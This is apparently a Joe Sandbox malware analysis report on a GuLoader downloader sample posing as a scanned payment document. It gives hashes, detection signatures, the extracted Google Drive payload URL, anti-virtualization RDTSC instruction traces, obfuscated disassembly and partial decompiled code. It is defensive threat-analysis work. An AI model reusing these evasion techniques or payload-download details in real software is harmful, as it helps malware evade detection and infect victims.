Play interactive tour

Edit tour

Windows Analysis Report Scanned Payment Copy00024.scr.exe

Overview

General Information

Sample Name:	Scanned Payment Copy00024.scr.exe
Analysis ID:	530423
MD5:	9ebaab853c410a3c6ef16ecf45739e8b
SHA1:	67c221c5f1329829d7a808791dc030bf1288d2d7
SHA256:	b24869692ba4efa8bb957cb2334ac798b570277c038db867db5a177a0e9a54ec
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Initial sample is a PE file and has a suspicious name

Tries to detect virtualization through RDTSC time measurements

Executable has a suspicious name (potential lure to open the executable)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Sample file is different than original file name gathered from version info

PE file contains strange resources

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

Scanned Payment Copy00024.scr.exe (PID: 7052 cmdline: "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe" MD5: 9EBAAB853C410A3C6EF16ECF45739E8B)

conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?expo"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.870438121.0000000002210000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000001.00000002.870438121.0000000002210000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?expo"}

Multi AV Scanner detection for submitted file

Show sources

Source: Scanned Payment Copy00024.scr.exe

ReversingLabs: Detection: 33%

Source: Scanned Payment Copy00024.scr.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?expo

System Summary:

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Scanned Payment Copy00024.scr.exe

Executable has a suspicious name (potential lure to open the executable)

Show sources

Source: Scanned Payment Copy00024.scr.exe

Static file information: Suspicious name

Source: Scanned Payment Copy00024.scr.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.870232976.0000000000424000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameDybblsbro.exe vs Scanned Payment Copy00024.scr.exe
Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.870541474.0000000002290000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDybblsbro.exeFE2XCorps vs Scanned Payment Copy00024.scr.exe
Source: Scanned Payment Copy00024.scr.exe	Binary or memory string: OriginalFilenameDybblsbro.exe vs Scanned Payment Copy00024.scr.exe

Source: Scanned Payment Copy00024.scr.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Code function: 1_2_004047F9	1_2_004047F9
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Code function: 1_2_0221DAB3	1_2_0221DAB3
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Code function: 1_2_022266EC	1_2_022266EC
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Code function: 1_2_02224A6E	1_2_02224A6E
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Code function: 1_2_0221086F	1_2_0221086F
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Code function: 1_2_02219887	1_2_02219887
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Code function: 1_2_02218E0F	1_2_02218E0F
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Code function: 1_2_0221E45E	1_2_0221E45E

Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe

Code function: 1_2_0221DAB3 NtAllocateVirtualMemory,

1_2_0221DAB3

Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe

Process Stats: CPU usage > 98%

Source: Scanned Payment Copy00024.scr.exe

ReversingLabs: Detection: 33%

Source: Scanned Payment Copy00024.scr.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe"
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_01

Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe

File created: C:\Users\user\AppData\Local\Temp\~DF25FB0965A4D91BCD.TMP

Jump to behavior

Source: classification engine

Classification label: mal80.troj.evad.winEXE@2/1@0/0

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000001.00000002.870438121.0000000002210000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Code function: 1_2_0040756B push 934A6E33h; ret	1_2_00407576
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Code function: 1_2_0040611D push 9754E4D4h; ret	1_2_00406122
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Code function: 1_2_00409A3E push B1F2CAE9h; ret	1_2_00409A4D
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Code function: 1_2_00405B8B push cs; retf	1_2_00405B8D
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Code function: 1_2_022110D0 push FFFFFFE3h; retf	1_2_02211076
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Code function: 1_2_02210F94 push FFFFFFE3h; retf	1_2_02211076

Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe

RDTSC instruction interceptor: First address: 000000000221CC1F second address: 000000000221CC1F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 297B4CD4h 0x00000007 add eax, 19FA60E4h 0x0000000c xor eax, 387E9150h 0x00000011 add eax, 84F4C319h 0x00000016 cpuid 0x00000018 cmp ax, bx 0x0000001b popad 0x0000001c call 00007F2E4C3945B7h 0x00000021 lfence 0x00000024 mov edx, F9458F60h 0x00000029 xor edx, 26C12333h 0x0000002f xor edx, 42BBF15Ah 0x00000035 xor edx, E2C15D1Dh 0x0000003b mov edx, dword ptr [edx] 0x0000003d lfence 0x00000040 ret 0x00000041 jmp 00007F2E4C3945ADh 0x00000046 cmp eax, ebx 0x00000048 sub edx, esi 0x0000004a ret 0x0000004b pop ecx 0x0000004c add edi, edx 0x0000004e dec ecx 0x0000004f mov dword ptr [ebp+00000177h], 07A58850h 0x00000059 xor dword ptr [ebp+00000177h], 9F18B554h 0x00000063 sub dword ptr [ebp+00000177h], D1AEA487h 0x0000006d test bx, cx 0x00000070 add dword ptr [ebp+00000177h], 38F16783h 0x0000007a test dl, bl 0x0000007c cmp ecx, dword ptr [ebp+00000177h] 0x00000082 jne 00007F2E4C3944A5h 0x00000084 mov dword ptr [ebp+000001B9h], eax 0x0000008a mov eax, ecx 0x0000008c push eax 0x0000008d mov eax, dword ptr [ebp+000001B9h] 0x00000093 call 00007F2E4C394625h 0x00000098 call 00007F2E4C3945DBh 0x0000009d lfence 0x000000a0 mov edx, F9458F60h 0x000000a5 xor edx, 26C12333h 0x000000ab xor edx, 42BBF15Ah 0x000000b1 xor edx, E2C15D1Dh 0x000000b7 mov edx, dword ptr [edx] 0x000000b9 lfence 0x000000bc ret 0x000000bd mov esi, edx 0x000000bf pushad 0x000000c0 rdtsc

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe

Code function: 1_2_0221D12A rdtsc

1_2_0221D12A

Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Code function: 1_2_02224A6E mov eax, dword ptr fs:[00000030h]	1_2_02224A6E
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Code function: 1_2_0221C8A3 mov eax, dword ptr fs:[00000030h]	1_2_0221C8A3
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Code function: 1_2_022226C0 mov eax, dword ptr fs:[00000030h]	1_2_022226C0
Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe	Code function: 1_2_02222FB6 mov eax, dword ptr fs:[00000030h]	1_2_02222FB6

Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe

Code function: 1_2_0221D12A rdtsc

1_2_0221D12A

Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe

Code function: 1_2_022266EC RtlAddVectoredExceptionHandler,

1_2_022266EC

Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.870360138.0000000000D80000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.870360138.0000000000D80000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.870360138.0000000000D80000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.870360138.0000000000D80000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection2	Process Injection2	OS Credential Dumping	Security Software Discovery11	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Obfuscated Files or Information1	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	System Information Discovery11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Scanned Payment Copy00024.scr.exe	33%	ReversingLabs	Win32.Worm.GenericML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	530423
Start date:	29.11.2021
Start time:	15:42:52
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Scanned Payment Copy00024.scr.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.troj.evad.winEXE@2/1@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 16.9% (good quality ratio 11.1%) Quality average: 35.1% Quality standard deviation: 32%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\~DF25FB0965A4D91BCD.TMP Download File
Process:	C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	1.9866006611106688
Encrypted:	false
SSDEEP:	96:jWpahLKAycVxc4LlvnffSIPW0wLzzj1ylDHn3Rs:KMhLKCxV5vnffI0wIdHBs
MD5:	A256BBA112F7FA34FE9E19ED07D0DF83
SHA1:	3E86ADD7C0890C55E8F22334A3E26134D7AB1EE8
SHA-256:	AB9F6744C55428A62F4696BC1779409A30420D0983EDD5536A0D280DF5EE7FE0
SHA-512:	9E762DFE82611778602E8BF19439E48AF7278D3D9399FF44666EB8A196206F4B1B50B9B623710B138BD7A7E9C1E0A05BE85CE6FB7B0F208C9664669297C416EA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.028365197002993
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Scanned Payment Copy00024.scr.exe
File size:	155648
MD5:	9ebaab853c410a3c6ef16ecf45739e8b
SHA1:	67c221c5f1329829d7a808791dc030bf1288d2d7
SHA256:	b24869692ba4efa8bb957cb2334ac798b570277c038db867db5a177a0e9a54ec
SHA512:	c0945c9b720ee31b8d2651ec584a02ca4373692dd1712fb09f4f87692c141bb86fd2f84b6b9dfa17f4bda49a7014682bdf7a0430b627381c6515ea679b9dabc3
SSDEEP:	1536:flfJffvxToSdAB/6lUUyaNTAETxEvZ0swq+A6T++DqfJffpfJff:9fJff9oKM/6ljyK5adwXqfJffpfJff
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L...i.xT.....................P............... ....@................

File Icon


Icon Hash:	70ecccaececc71e2

Static PE Info

General
Entrypoint:	0x4015a8
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5478D769 [Fri Nov 28 20:13:29 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	458ac857eb15a6ebaad7748f2f663dae

Entrypoint Preview

Instruction
push 00402D28h
call 00007F2E4CD63F75h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
mov byte ptr [ebx+63h], dl
and ebx, ebp
or eax, 75ECAF4Ch
or ebx, dword ptr [edi+edi*2+00005007h]
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
and byte ptr [ecx+73h], al
and byte ptr [ecx+6Eh], cl
inc edx
jne 00007F2E4CD63FF4h
jne 00007F2E4CD63FE5h
push 73003661h
bound eax, dword ptr [edx+70h]
xor dh, byte ptr [ebx+32h]
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
add eax, 98CA9952h
ror byte ptr [ecx-34h], cl
inc esi
mov eax, E7A55955h
lea edx, ecx
je 00007F2E4CD63FD1h
mov edx, FB574C67h
inc edi
test al, 6Fh
inc edx
jmp dword ptr [edi]
loope 00007F2E4CD63F9Eh
pop ds
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
outsb
push ss
add byte ptr [eax], al
jnp 00007F2E4CD63F97h
add byte ptr [eax], al
add byte ptr [eax+eax], al
dec ebp
inc ecx
push ebp
inc esp
add byte ptr [54000401h], cl
outsd
outsb
imul eax, dword ptr [eax], 42000119h
add byte ptr [ebx], ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x21264	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24000	0x2f2c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x194	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x20838	0x21000	False	0.353278882576	data	5.18913238109	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x22000	0x1250	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x24000	0x2f2c	0x3000	False	0.232584635417	data	4.20201309343	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
CUSTOM	0x25992	0x1542	data	English	United States
RT_ICON	0x248ea	0x10a8	data
RT_ICON	0x24482	0x468	GLS_BINARY_LSB_FIRST
RT_STRING	0x26ed4	0x58	data	English	United States
RT_GROUP_ICON	0x24460	0x22	data
RT_VERSION	0x241c0	0x2a0	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

__vbaVarTstGt, _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, __vbaVarIdiv, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, __vbaAryConstruct2, __vbaPrintObj, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaUbound, _CIlog, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, _CIatan, __vbaStrMove, __vbaAryCopy, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	Corps
InternalName	Dybblsbro
FileVersion	1.00
CompanyName	Corps
LegalTrademarks	Corps
ProductName	Corps
ProductVersion	1.00
FileDescription	Corps
OriginalFilename	Dybblsbro.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Scanned Payment Copy00024.scr.exe PID: 7052 Parent PID: 5288

General

Start time:	15:43:51
Start date:	29/11/2021
Path:	C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe"
Imagebase:	0x400000
File size:	155648 bytes
MD5 hash:	9EBAAB853C410A3C6EF16ECF45739E8B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.870438121.0000000002210000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 7116 Parent PID: 7052

General

Start time:	15:43:51
Start date:	29/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Scanned Payment Copy00024.scr.exe PID: 7052 Parent PID: 5288 Scanned Payment Copy00024.scr.exeCOMMON

Executed Functions

Function 022266EC, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

RtlAddVectoredExceptionHandler.NTDLL ref: 022274E7

Strings

~lJ, xrefs: 0222713F

Memory Dump Source

Source File: 00000001.00000002.870438121.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID: ~lJ
API String ID: 3310709589-712099849
Opcode ID: f0b6b739012560cd1a49ea002017aad75067a11a3bde2cc74983a091167dcdf0
Instruction ID: 66d902dfb28a52e6bfbb006705bea54cf833c7c5ebda5bd94dc97cb85cd9a6c7
Opcode Fuzzy Hash: f0b6b739012560cd1a49ea002017aad75067a11a3bde2cc74983a091167dcdf0
Instruction Fuzzy Hash: 3B913571528399EFCF35DF65C9947EA7BA2BF89310F11412ACC0A9B218CBB18649CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0221DAB3, Relevance: 1.6, APIs: 1, Instructions: 132memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 0221DE8B

Memory Dump Source

Source File: 00000001.00000002.870438121.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: efa30f1ce74c5ec441a7953b2e5e86ac131e36713ea4d1615a524e4cff9b89dd
Instruction ID: fe1fd2490d01737a78cfde28629bad1ba07a1acd737e0aba98e766d50d790449
Opcode Fuzzy Hash: efa30f1ce74c5ec441a7953b2e5e86ac131e36713ea4d1615a524e4cff9b89dd
Instruction Fuzzy Hash: BC412475214385CFEB709EA5CD85BEEB7E2EF99340F55841DDC888B228C7704A44CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0041CC84, Relevance: 344.8, APIs: 180, Strings: 16, Instructions: 1804
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0041CC84(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				char _v8;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v40;
				void* _v44;
				void* _v48;
				short _v52;
				void* _v56;
				void* _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				short _v76;
				void* _v80;
				char _v96;
				char _v100;
				void* _v104;
				signed int _v108;
				char _v112;
				signed int _v116;
				signed int _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				intOrPtr _v148;
				char _v156;
				char _v172;
				char _v176;
				char* _v184;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				intOrPtr* _v260;
				signed int _v264;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				intOrPtr* _v308;
				signed int _v312;
				signed int _v316;
				intOrPtr* _v320;
				signed int _v324;
				intOrPtr* _v328;
				signed int _v332;
				intOrPtr* _v336;
				signed int _v340;
				intOrPtr* _v344;
				signed int _v348;
				intOrPtr* _v352;
				signed int _v356;
				intOrPtr* _v360;
				signed int _v364;
				intOrPtr* _v368;
				signed int _v372;
				intOrPtr* _v376;
				signed int _v380;
				intOrPtr* _v384;
				signed int _v388;
				intOrPtr* _v392;
				signed int _v396;
				intOrPtr* _v400;
				signed int _v404;
				intOrPtr* _v408;
				signed int _v412;
				signed int _v416;
				intOrPtr* _v420;
				signed int _v424;
				intOrPtr* _v428;
				signed int _v432;
				intOrPtr* _v436;
				signed int _v440;
				signed int _v444;
				intOrPtr* _v448;
				signed int _v452;
				intOrPtr* _v456;
				signed int _v460;
				intOrPtr* _v464;
				signed int _v468;
				intOrPtr* _v472;
				signed int _v476;
				intOrPtr* _v480;
				signed int _v484;
				intOrPtr* _v488;
				signed int _v492;
				intOrPtr* _v496;
				signed int _v500;
